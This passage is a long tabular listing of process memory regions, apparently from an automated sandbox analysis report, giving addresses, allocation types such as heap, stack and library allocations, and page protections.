unclassified section
|
page write copy
|
||
|
29E52B9F000
|
heap
|
page read and write
|
||
|
2A872BC0000
|
heap
|
page read and write
|
||
|
2A85A710000
|
heap
|
page execute and read and write
|
||
|
1D66E6A0000
|
heap
|
page read and write
|
||
|
17E16EF0000
|
heap
|
page read and write
|
||
|
1AE02BFC000
|
trusted library allocation
|
page read and write
|
||
|
29E38770000
|
trusted library allocation
|
page read and write
|
||
|
29E3B274000
|
trusted library allocation
|
page read and write
|
||
|
17E80160000
|
heap
|
page read and write
|
||
|
1AE1A728000
|
heap
|
page read and write
|
||
|
1DF582AA000
|
heap
|
page read and write
|
||
|
FF05F7E000
|
stack
|
page read and write
|
||
|
2A873FB1000
|
unclassified section
|
page execute read
|
||
|
281382EE000
|
heap
|
page read and write
|
||
|
179D1FB8000
|
heap
|
page read and write
|
||
|
17EEA019000
|
trusted library allocation
|
page read and write
|
||
|
2813BE00000
|
direct allocation
|
page read and write
|
||
|
179D3A90000
|
heap
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
E1F058E000
|
stack
|
page read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
201DA9A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
17E16EF8000
|
heap
|
page read and write
|
||
|
C000136000
|
direct allocation
|
page read and write
|
||
|
2A873024000
|
direct allocation
|
page read and write
|
||
|
17EEA55F000
|
trusted library allocation
|
page read and write
|
||
|
FF065FB000
|
stack
|
page read and write
|
||
|
17E80307000
|
heap
|
page read and write
|
||
|
2813831B000
|
heap
|
page read and write
|
||
|
2A85A430000
|
trusted library allocation
|
page read and write
|
||
|
1AE1A714000
|
heap
|
page read and write
|
||
|
1EC47144000
|
trusted library allocation
|
page read and write
|
||
|
E1EF37E000
|
stack
|
page read and write
|
||
|
1EC5F0BB000
|
heap
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
E1EF07E000
|
stack
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
201E2CF0000
|
heap
|
page read and write
|
||
|
207C40E0000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
201CA5A0000
|
trusted library allocation
|
page read and write
|
||
|
C000484000
|
direct allocation
|
page read and write
|
||
|
1EC46B72000
|
trusted library allocation
|
page read and write
|
||
|
2813BBE0000
|
direct allocation
|
page read and write
|
||
|
1FF2D410000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
A111D3C000
|
stack
|
page read and write
|
||
|
29E387CF000
|
heap
|
page read and write
|
||
|
17E801DE000
|
heap
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
179D1FB0000
|
heap
|
page read and write
|
||
|
C000452000
|
direct allocation
|
page read and write
|
||
|
B842D7F000
|
stack
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
17EE7360000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
2813BD70000
|
direct allocation
|
page read and write
|
||
|
2A874712000
|
unclassified section
|
page read and write
|
||
|
7FFD9BB92000
|
trusted library allocation
|
page read and write
|
||
|
1EC45036000
|
heap
|
page read and write
|
||
|
2066B390000
|
heap
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2813BC20000
|
direct allocation
|
page read and write
|
||
|
179D3E90000
|
heap
|
page read and write
|
||
|
201CA991000
|
trusted library allocation
|
page read and write
|
||
|
201E3350000
|
heap
|
page read and write
|
||
|
39380CE000
|
stack
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
1EC56FAD000
|
trusted library allocation
|
page read and write
|
||
|
1EC5F330000
|
heap
|
page read and write
|
||
|
201E3039000
|
heap
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
2813838F000
|
heap
|
page read and write
|
||
|
C000116000
|
direct allocation
|
page read and write
|
||
|
2813BBA0000
|
direct allocation
|
page read and write
|
||
|
17EE84CC000
|
trusted library allocation
|
page read and write
|
||
|
201E2FA0000
|
trusted library section
|
page read and write
|
||
|
29E3B250000
|
trusted library allocation
|
page read and write
|
||
|
17EE5A8C000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BE00000
|
trusted library allocation
|
page read and write
|
||
|
17EEA505000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD18000
|
trusted library allocation
|
page read and write
|
||
|
281382C9000
|
heap
|
page read and write
|
||
|
1AE1A7AC000
|
heap
|
page read and write
|
||
|
28138361000
|
heap
|
page read and write
|
||
|
C0002C1000
|
direct allocation
|
page read and write
|
||
|
1D66E970000
|
heap
|
page read and write
|
||
|
29E52786000
|
heap
|
page execute and read and write
|
||
|
E1F048A000
|
stack
|
page read and write
|
||
|
C00004F000
|
direct allocation
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page execute and read and write
|
||
|
201CBFF0000
|
trusted library allocation
|
page read and write
|
||
|
29E3A9E1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD10000
|
trusted library allocation
|
page read and write
|
||
|
2A86A791000
|
trusted library allocation
|
page read and write
|
||
|
FF061FE000
|
stack
|
page read and write
|
||
|
29E4A4BD000
|
trusted library allocation
|
page read and write
|
||
|
201CBFB8000
|
trusted library allocation
|
page read and write
|
||
|
28138346000
|
heap
|
page read and write
|
||
|
29E387ED000
|
heap
|
page read and write
|
||
|
1EA08EF0000
|
heap
|
page read and write
|
||
|
1F984220000
|
heap
|
page read and write
|
||
|
29E3B4C0000
|
trusted library allocation
|
page read and write
|
||
|
C0004AA000
|
direct allocation
|
page read and write
|
||
|
29E3B7FE000
|
trusted library allocation
|
page read and write
|
||
|
201CA5C0000
|
heap
|
page execute and read and write
|
||
|
2A8589D0000
|
heap
|
page read and write
|
||
|
29E52B96000
|
heap
|
page read and write
|
||
|
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
|
2A86CFA7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B2000
|
trusted library allocation
|
page read and write
|
||
|
17EE84BA000
|
trusted library allocation
|
page read and write
|
||
|
E1F0103000
|
stack
|
page read and write
|
||
|
C0000CC000
|
direct allocation
|
page read and write
|
||
|
C000504000
|
direct allocation
|
page read and write
|
||
|
1EC44E80000
|
heap
|
page read and write
|
||
|
2066B410000
|
heap
|
page read and write
|
||
|
1FF2D3D0000
|
heap
|
page read and write
|
||
|
201C8C30000
|
heap
|
page read and write
|
||
|
39370FE000
|
stack
|
page read and write
|
||
|
2A85AB11000
|
trusted library allocation
|
page read and write
|
||
|
29E52AB9000
|
heap
|
page read and write
|
||
|
C000000000
|
direct allocation
|
page read and write
|
||
|
E1F050C000
|
stack
|
page read and write
|
||
|
2A858AB5000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC46CA0000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
28138308000
|
heap
|
page read and write
|
||
|
1F984300000
|
heap
|
page read and write
|
||
|
B7325FF000
|
stack
|
page read and write
|
||
|
1EC48812000
|
trusted library allocation
|
page read and write
|
||
|
DD063FC000
|
stack
|
page read and write
|
||
|
1AE0272A000
|
trusted library allocation
|
page read and write
|
||
|
1EC44EC0000
|
heap
|
page read and write
|
||
|
310FFBE000
|
stack
|
page read and write
|
||
|
39373F6000
|
stack
|
page read and write
|
||
|
1F7E95A4000
|
heap
|
page read and write
|
||
|
29E387A0000
|
heap
|
page readonly
|
||
|
2A86A7EE000
|
trusted library allocation
|
page read and write
|
||
|
179D200E000
|
heap
|
page read and write
|
||
|
393858E000
|
stack
|
page read and write
|
||
|
F1D29EE000
|
stack
|
page read and write
|
||
|
7FFD9BCE3000
|
trusted library allocation
|
page read and write
|
||
|
28139CFB000
|
direct allocation
|
page read and write
|
||
|
1EC47FFC000
|
trusted library allocation
|
page read and write
|
||
|
29E38900000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
FAB6236000
|
stack
|
page read and write
|
||
|
17E16E20000
|
heap
|
page read and write
|
||
|
29E52820000
|
heap
|
page read and write
|
||
|
17E803CB000
|
heap
|
page read and write
|
||
|
1EC44F24000
|
heap
|
page read and write
|
||
|
179D2104000
|
heap
|
page read and write
|
||
|
3937478000
|
stack
|
page read and write
|
||
|
17E8045A000
|
heap
|
page read and write
|
||
|
2A879A30000
|
direct allocation
|
page read and write
|
||
|
2A872B00000
|
heap
|
page read and write
|
||
|
1EC47146000
|
trusted library allocation
|
page read and write
|
||
|
2A85AB5D000
|
trusted library allocation
|
page read and write
|
||
|
2813831B000
|
heap
|
page read and write
|
||
|
7FFD9BDF0000
|
trusted library allocation
|
page read and write
|
||
|
71BC8FE000
|
stack
|
page read and write
|
||
|
FF0617E000
|
stack
|
page read and write
|
||
|
28138260000
|
heap
|
page read and write
|
||
|
3936D6E000
|
unkown
|
page read and write
|
||
|
B7C494C000
|
stack
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
1EC5EEB1000
|
heap
|
page read and write
|
||
|
2A873480000
|
direct allocation
|
page read and write
|
||
|
1AE006C0000
|
heap
|
page read and write
|
||
|
2A874780000
|
unclassified section
|
page read and write
|
||
|
17E80430000
|
heap
|
page read and write
|
||
|
17E803EC000
|
heap
|
page read and write
|
||
|
3B9D4FF000
|
stack
|
page read and write
|
||
|
E1EF6FC000
|
stack
|
page read and write
|
||
|
207C4100000
|
heap
|
page read and write
|
||
|
2A858A43000
|
heap
|
page read and write
|
||
|
2A8743F3000
|
unclassified section
|
page readonly
|
||
|
2066B440000
|
heap
|
page read and write
|
||
|
B7C4C7F000
|
stack
|
page read and write
|
||
|
1AE02C4E000
|
trusted library allocation
|
page read and write
|
||
|
C0003D0000
|
direct allocation
|
page read and write
|
||
|
201CC5AE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D66E880000
|
heap
|
page read and write
|
||
|
2A86B1A7000
|
trusted library allocation
|
page read and write
|
||
|
28139CA0000
|
direct allocation
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
24150B38000
|
heap
|
page read and write
|
||
|
28139D60000
|
direct allocation
|
page read and write
|
||
|
7FFD9BE30000
|
trusted library allocation
|
page read and write
|
||
|
17EEA537000
|
trusted library allocation
|
page read and write
|
||
|
24150AC0000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
C0003AF000
|
direct allocation
|
page read and write
|
||
|
28139CE0000
|
direct allocation
|
page read and write
|
||
|
1AE02264000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
201CC5AA000
|
trusted library allocation
|
page read and write
|
||
|
17EEA4A5000
|
trusted library allocation
|
page read and write
|
||
|
FF063F8000
|
stack
|
page read and write
|
||
|
29E52AA0000
|
heap
|
page read and write
|
||
|
28138304000
|
heap
|
page read and write
|
||
|
201DAC8C000
|
trusted library allocation
|
page read and write
|
||
|
1D66E974000
|
heap
|
page read and write
|
||
|
7FFD9BB85000
|
trusted library allocation
|
page read and write
|
||
|
C0000C8000
|
direct allocation
|
page read and write
|
||
|
29E52AFC000
|
heap
|
page read and write
|
||
|
1EC46CB1000
|
trusted library allocation
|
page read and write
|
||
|
1EC46C50000
|
heap
|
page execute and read and write
|
||
|
1EC46C57000
|
heap
|
page execute and read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page execute and read and write
|
||
|
17EE9507000
|
trusted library allocation
|
page read and write
|
||
|
2A8743EA000
|
unclassified section
|
page read and write
|
||
|
1EC5EF50000
|
heap
|
page read and write
|
||
|
17EE59C0000
|
heap
|
page read and write
|
||
|
29E52B8F000
|
heap
|
page read and write
|
||
|
1EC4705E000
|
trusted library allocation
|
page read and write
|
||
|
FAB633A000
|
stack
|
page read and write
|
||
|
201CABC2000
|
trusted library allocation
|
page read and write
|
||
|
29E38834000
|
heap
|
page read and write
|
||
|
393767B000
|
stack
|
page read and write
|
||
|
17EEA565000
|
trusted library allocation
|
page read and write
|
||
|
201CBFD6000
|
trusted library allocation
|
page read and write
|
||
|
1F7E95A0000
|
heap
|
page read and write
|
||
|
2813BE15000
|
direct allocation
|
page read and write
|
||
|
1AE1A74A000
|
heap
|
page read and write
|
||
|
2813830F000
|
heap
|
page read and write
|
||
|
7FFD9BB5A000
|
trusted library allocation
|
page read and write
|
||
|
16107E40000
|
heap
|
page read and write
|
||
|
C00041A000
|
direct allocation
|
page read and write
|
||
|
201CA83F000
|
heap
|
page read and write
|
||
|
310FEB9000
|
stack
|
page read and write
|
||
|
29E52B23000
|
heap
|
page read and write
|
||
|
7DA60F9000
|
stack
|
page read and write
|
||
|
1EC56D24000
|
trusted library allocation
|
page read and write
|
||
|
2813833D000
|
heap
|
page read and write
|
||
|
1AE027A5000
|
trusted library allocation
|
page read and write
|
||
|
A11207E000
|
stack
|
page read and write
|
||
|
1AE02828000
|
trusted library allocation
|
page read and write
|
||
|
E1EF2FE000
|
stack
|
page read and write
|
||
|
1FF2D44A000
|
heap
|
page read and write
|
||
|
1EC5F060000
|
heap
|
page execute and read and write
|
||
|
179D3E99000
|
heap
|
page read and write
|
||
|
7DA6ECD000
|
stack
|
page read and write
|
||
|
C0000C4000
|
direct allocation
|
page read and write
|
||
|
1EA092E4000
|
heap
|
page read and write
|
||
|
2813BDCF000
|
direct allocation
|
page read and write
|
||
|
1EC46D37000
|
trusted library allocation
|
page read and write
|
||
|
7BB70FE000
|
stack
|
page read and write
|
||
|
201C8C70000
|
heap
|
page read and write
|
||
|
17EE5CE0000
|
trusted library section
|
page read and write
|
||
|
FAB6178000
|
stack
|
page read and write
|
||
|
310FE38000
|
stack
|
page read and write
|
||
|
2A872DC5000
|
heap
|
page read and write
|
||
|
1AE020F0000
|
trusted library allocation
|
page read and write
|
||
|
201CC051000
|
trusted library allocation
|
page read and write
|
||
|
179D1FFE000
|
heap
|
page read and write
|
||
|
17E80346000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
1AE1A787000
|
heap
|
page read and write
|
||
|
179D3E9B000
|
heap
|
page read and write
|
||
|
1F7E9310000
|
heap
|
page read and write
|
||
|
AD62D8C000
|
stack
|
page read and write
|
||
|
2813832E000
|
heap
|
page read and write
|
||
|
7FFD9BDA0000
|
trusted library allocation
|
page read and write
|
||
|
A111DBF000
|
stack
|
page read and write
|
||
|
FF05E73000
|
stack
|
page read and write
|
||
|
7FFD9BB85000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC1F000
|
trusted library allocation
|
page read and write
|
||
|
28139CE7000
|
direct allocation
|
page read and write
|
||
|
2813BC80000
|
direct allocation
|
page read and write
|
||
|
7BB74FE000
|
stack
|
page read and write
|
||
|
29E385E0000
|
heap
|
page read and write
|
||
|
201CA786000
|
heap
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
17EE9F71000
|
trusted library allocation
|
page read and write
|
||
|
1AE027F8000
|
trusted library allocation
|
page read and write
|
||
|
C0000A8000
|
direct allocation
|
page read and write
|
||
|
29E3AB01000
|
trusted library allocation
|
page read and write
|
||
|
7DA63FB000
|
stack
|
page read and write
|
||
|
C000489000
|
direct allocation
|
page read and write
|
||
|
C000335000
|
direct allocation
|
page read and write
|
||
|
7FFD9BDD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
29E38766000
|
heap
|
page read and write
|
||
|
17EEA501000
|
trusted library allocation
|
page read and write
|
||
|
1AE02130000
|
trusted library allocation
|
page read and write
|
||
|
17EEA561000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
2066B3B0000
|
heap
|
page read and write
|
||
|
17EEA035000
|
trusted library allocation
|
page read and write
|
||
|
17EE74C0000
|
trusted library allocation
|
page read and write
|
||
|
1EC5EE79000
|
heap
|
page read and write
|
||
|
17E8033A000
|
heap
|
page read and write
|
||
|
1EC46B20000
|
heap
|
page execute and read and write
|
||
|
17EE84BC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
201C8C10000
|
heap
|
page read and write
|
||
|
1AE1A9A0000
|
heap
|
page read and write
|
||
|
FF0657E000
|
stack
|
page read and write
|
||
|
1EC5EDCC000
|
heap
|
page read and write
|
||
|
C000480000
|
direct allocation
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
21EF0BC4000
|
heap
|
page read and write
|
||
|
29E52628000
|
heap
|
page read and write
|
||
|
2813BB60000
|
direct allocation
|
page read and write
|
||
|
E1EF5FE000
|
stack
|
page read and write
|
||
|
29E38720000
|
heap
|
page read and write
|
||
|
310FA7F000
|
stack
|
page read and write
|
||
|
29E38760000
|
heap
|
page read and write
|
||
|
C00043C000
|
direct allocation
|
page read and write
|
||
|
DD0667F000
|
stack
|
page read and write
|
||
|
7FFD9BD20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
39376FC000
|
stack
|
page read and write
|
||
|
2A872DD5000
|
heap
|
page read and write
|
||
|
17EE5D04000
|
heap
|
page read and write
|
||
|
1AE006D0000
|
heap
|
page read and write
|
||
|
1AE1A6E0000
|
heap
|
page read and write
|
||
|
DD066FF000
|
stack
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
17EE7390000
|
trusted library allocation
|
page read and write
|
||
|
1AE1A6F8000
|
heap
|
page read and write
|
||
|
1AE007C3000
|
heap
|
page read and write
|
||
|
2813BB20000
|
direct allocation
|
page read and write
|
||
|
1EC44F00000
|
trusted library allocation
|
page read and write
|
||
|
2A872AF4000
|
heap
|
page read and write
|
||
|
7DA6F0E000
|
stack
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
FAB62B9000
|
stack
|
page read and write
|
||
|
1AE027E6000
|
trusted library allocation
|
page read and write
|
||
|
2813836A000
|
heap
|
page read and write
|
||
|
29E3A6CF000
|
trusted library allocation
|
page read and write
|
||
|
2A85AAED000
|
trusted library allocation
|
page read and write
|
||
|
C000028000
|
direct allocation
|
page read and write
|
||
|
29E388F0000
|
heap
|
page read and write
|
||
|
2A85A480000
|
heap
|
page read and write
|
||
|
201C8F70000
|
heap
|
page read and write
|
||
|
29E388AC000
|
heap
|
page read and write
|
||
|
179D1FD8000
|
heap
|
page read and write
|
||
|
281382E4000
|
heap
|
page read and write
|
||
|
7FFD9B9A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2813BBC0000
|
direct allocation
|
page read and write
|
||
|
C0003B4000
|
direct allocation
|
page read and write
|
||
|
2A85ABAE000
|
trusted library allocation
|
page read and write
|
||
|
281382E1000
|
heap
|
page read and write
|
||
|
1AE027E9000
|
trusted library allocation
|
page read and write
|
||
|
17E80199000
|
heap
|
page read and write
|
||
|
17EE7330000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
|
C00003D000
|
direct allocation
|
page read and write
|
||
|
17EE928A000
|
trusted library allocation
|
page read and write
|
||
|
201CBF9B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
C0003B2000
|
direct allocation
|
page read and write
|
||
|
7FFD9BB8A000
|
trusted library allocation
|
page read and write
|
||
|
1AE02B92000
|
trusted library allocation
|
page read and write
|
||
|
281384F4000
|
heap
|
page read and write
|
||
|
C000462000
|
direct allocation
|
page read and write
|
||
|
207C42D0000
|
heap
|
page read and write
|
||
|
7BB76FE000
|
stack
|
page read and write
|
||
|
E1EF77B000
|
stack
|
page read and write
|
||
|
E1EF478000
|
stack
|
page read and write
|
||
|
7FFD9BB51000
|
trusted library allocation
|
page read and write
|
||
|
2813BCE0000
|
direct allocation
|
page read and write
|
||
|
29E52800000
|
heap
|
page read and write
|
||
|
161081B0000
|
heap
|
page read and write
|
||
|
7FFD9B9BB000
|
trusted library allocation
|
page read and write
|
||
|
7DA6076000
|
stack
|
page read and write
|
||
|
161081B4000
|
heap
|
page read and write
|
||
|
29E4A1F1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
1FF2D447000
|
heap
|
page read and write
|
||
|
C00048D000
|
direct allocation
|
page read and write
|
||
|
2A874787000
|
unclassified section
|
page read and write
|
||
|
310F76F000
|
stack
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A872BE0000
|
heap
|
page read and write
|
||
|
1AE126E1000
|
trusted library allocation
|
page read and write
|
||
|
2A872D8B000
|
heap
|
page read and write
|
||
|
C0000E8000
|
direct allocation
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
17EE97DA000
|
trusted library allocation
|
page read and write
|
||
|
1AE1A7B5000
|
heap
|
page read and write
|
||
|
2813839C000
|
heap
|
page read and write
|
||
|
16107F60000
|
heap
|
page read and write
|
||
|
C00047C000
|
direct allocation
|
page read and write
|
||
|
2A8589F0000
|
heap
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
1AE026F8000
|
trusted library allocation
|
page read and write
|
||
|
179D1FC9000
|
heap
|
page read and write
|
||
|
B842C7C000
|
stack
|
page read and write
|
||
|
28138303000
|
heap
|
page read and write
|
||
|
1EC44F30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
FAB63BF000
|
stack
|
page read and write
|
||
|
F1D296E000
|
stack
|
page read and write
|
||
|
17EE59E0000
|
heap
|
page read and write
|
||
|
B7326FF000
|
stack
|
page read and write
|
||
|
7FFD9BE10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F98432A000
|
heap
|
page read and write
|
||
|
7FFD9BD20000
|
trusted library allocation
|
page read and write
|
||
|
2813BC00000
|
direct allocation
|
page read and write
|
||
|
E1F01CE000
|
stack
|
page read and write
|
||
|
7DA61F9000
|
stack
|
page read and write
|
||
|
C0003CC000
|
direct allocation
|
page read and write
|
||
|
C0004A0000
|
direct allocation
|
page read and write
|
||
|
2A8730B0000
|
direct allocation
|
page execute and read and write
|
||
|
FF06FCE000
|
stack
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
29E3B4E8000
|
trusted library allocation
|
page read and write
|
||
|
2A85A583000
|
heap
|
page read and write
|
||
|
352AFE000
|
stack
|
page read and write
|
||
|
7FFD9BB52000
|
trusted library allocation
|
page read and write
|
||
|
2A8743ED000
|
unclassified section
|
page read and write
|
||
|
1AE00734000
|
heap
|
page read and write
|
||
|
1D66E8A0000
|
heap
|
page read and write
|
||
|
FF06279000
|
stack
|
page read and write
|
||
|
1EC482C2000
|
trusted library allocation
|
page read and write
|
||
|
28138316000
|
heap
|
page read and write
|
||
|
28138319000
|
heap
|
page read and write
|
||
|
1AE02764000
|
trusted library allocation
|
page read and write
|
||
|
C00004B000
|
direct allocation
|
page read and write
|
||
|
2A874788000
|
unclassified section
|
page readonly
|
||
|
7FFD9BB61000
|
trusted library allocation
|
page read and write
|
||
|
2A85A756000
|
heap
|
page execute and read and write
|
||
|
C000006000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA36000
|
trusted library allocation
|
page read and write
|
||
|
2A879A40000
|
direct allocation
|
page read and write
|
||
|
1F7E9367000
|
heap
|
page read and write
|
||
|
17E16E00000
|
heap
|
page read and write
|
||
|
C000056000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA56000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
393717B000
|
stack
|
page read and write
|
||
|
7FFD9B9A4000
|
trusted library allocation
|
page read and write
|
||
|
17EE5B49000
|
heap
|
page read and write
|
||
|
17EE98A6000
|
trusted library allocation
|
page read and write
|
||
|
17E16F25000
|
heap
|
page read and write
|
||
|
28139CE3000
|
direct allocation
|
page read and write
|
||
|
17E80180000
|
heap
|
page read and write
|
||
|
E1EF0FE000
|
stack
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
C0000C2000
|
direct allocation
|
page read and write
|
||
|
201CC286000
|
trusted library allocation
|
page read and write
|
||
|
201CA8B1000
|
heap
|
page read and write
|
||
|
30449CD000
|
stack
|
page read and write
|
||
|
17EE82E5000
|
trusted library allocation
|
page read and write
|
||
|
39384CF000
|
stack
|
page read and write
|
||
|
7BB6CFA000
|
stack
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
2A85ABAA000
|
trusted library allocation
|
page read and write
|
||
|
7DA637B000
|
stack
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
FAB653B000
|
stack
|
page read and write
|
||
|
E1F038F000
|
stack
|
page read and write
|
||
|
2A85A770000
|
heap
|
page execute and read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
FF05FFE000
|
stack
|
page read and write
|
||
|
FAB607E000
|
stack
|
page read and write
|
||
|
1AE02705000
|
trusted library allocation
|
page read and write
|
||
|
1AE00730000
|
heap
|
page read and write
|
||
|
7FFD9BD40000
|
trusted library allocation
|
page read and write
|
||
|
1AE02150000
|
heap
|
page read and write
|
||
|
393860E000
|
stack
|
page read and write
|
||
|
17EE5A50000
|
heap
|
page read and write
|
||
|
1AE1A779000
|
heap
|
page read and write
|
||
|
17EEA4FF000
|
trusted library allocation
|
page read and write
|
||
|
29E38930000
|
trusted library allocation
|
page read and write
|
||
|
1AE12760000
|
trusted library allocation
|
page read and write
|
||
|
71BC4FE000
|
stack
|
page read and write
|
||
|
201E2FB3000
|
heap
|
page read and write
|
||
|
24150B3A000
|
heap
|
page read and write
|
||
|
FAB60FE000
|
stack
|
page read and write
|
||
|
7FFD9BB82000
|
trusted library allocation
|
page read and write
|
||
|
310FB7E000
|
stack
|
page read and write
|
||
|
7DA700C000
|
stack
|
page read and write
|
||
|
17E80224000
|
heap
|
page read and write
|
||
|
1EC48328000
|
trusted library allocation
|
page read and write
|
||
|
3B9D47F000
|
stack
|
page read and write
|
||
|
2A8799A0000
|
direct allocation
|
page read and write
|
||
|
17EE9F6F000
|
trusted library allocation
|
page read and write
|
||
|
269930F000
|
stack
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
7DA5FFD000
|
stack
|
page read and write
|
||
|
C000366000
|
direct allocation
|
page read and write
|
||
|
2813830A000
|
heap
|
page read and write
|
||
|
1EC44FC6000
|
heap
|
page read and write
|
||
|
281382EE000
|
heap
|
page read and write
|
||
|
2A87478D000
|
unclassified section
|
page readonly
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
1EC4503C000
|
heap
|
page read and write
|
||
|
C000010000
|
direct allocation
|
page read and write
|
||
|
17EE5CF0000
|
trusted library allocation
|
page read and write
|
||
|
29E38A00000
|
heap
|
page execute and read and write
|
||
|
29E526AB000
|
heap
|
page read and write
|
||
|
17EE84C3000
|
trusted library allocation
|
page read and write
|
||
|
25BE6120000
|
heap
|
page read and write
|
||
|
28138307000
|
heap
|
page read and write
|
||
|
1AE02727000
|
trusted library allocation
|
page read and write
|
||
|
FAB64BE000
|
stack
|
page read and write
|
||
|
17EEA4D3000
|
trusted library allocation
|
page read and write
|
||
|
1DF581F0000
|
heap
|
page read and write
|
||
|
201E2FED000
|
heap
|
page read and write
|
||
|
17EE73C0000
|
trusted library allocation
|
page read and write
|
||
|
2A872D59000
|
heap
|
page read and write
|
||
|
2A8743B3000
|
unclassified section
|
page write copy
|
||
|
24150B30000
|
heap
|
page read and write
|
||
|
310FD3E000
|
stack
|
page read and write
|
||
|
201CC4E4000
|
trusted library allocation
|
page read and write
|
||
|
2A85AAE6000
|
trusted library allocation
|
page read and write
|
||
|
1AE1A705000
|
heap
|
page read and write
|
||
|
1AE0075E000
|
heap
|
page read and write
|
||
|
FF06379000
|
stack
|
page read and write
|
||
|
17EE74C3000
|
trusted library allocation
|
page read and write
|
||
|
1EC470EC000
|
trusted library allocation
|
page read and write
|
||
|
2A8730A0000
|
heap
|
page read and write
|
||
|
C0000BA000
|
direct allocation
|
page read and write
|
||
|
1F7E9360000
|
heap
|
page read and write
|
||
|
201CA630000
|
trusted library allocation
|
page read and write
|
||
|
AD6307F000
|
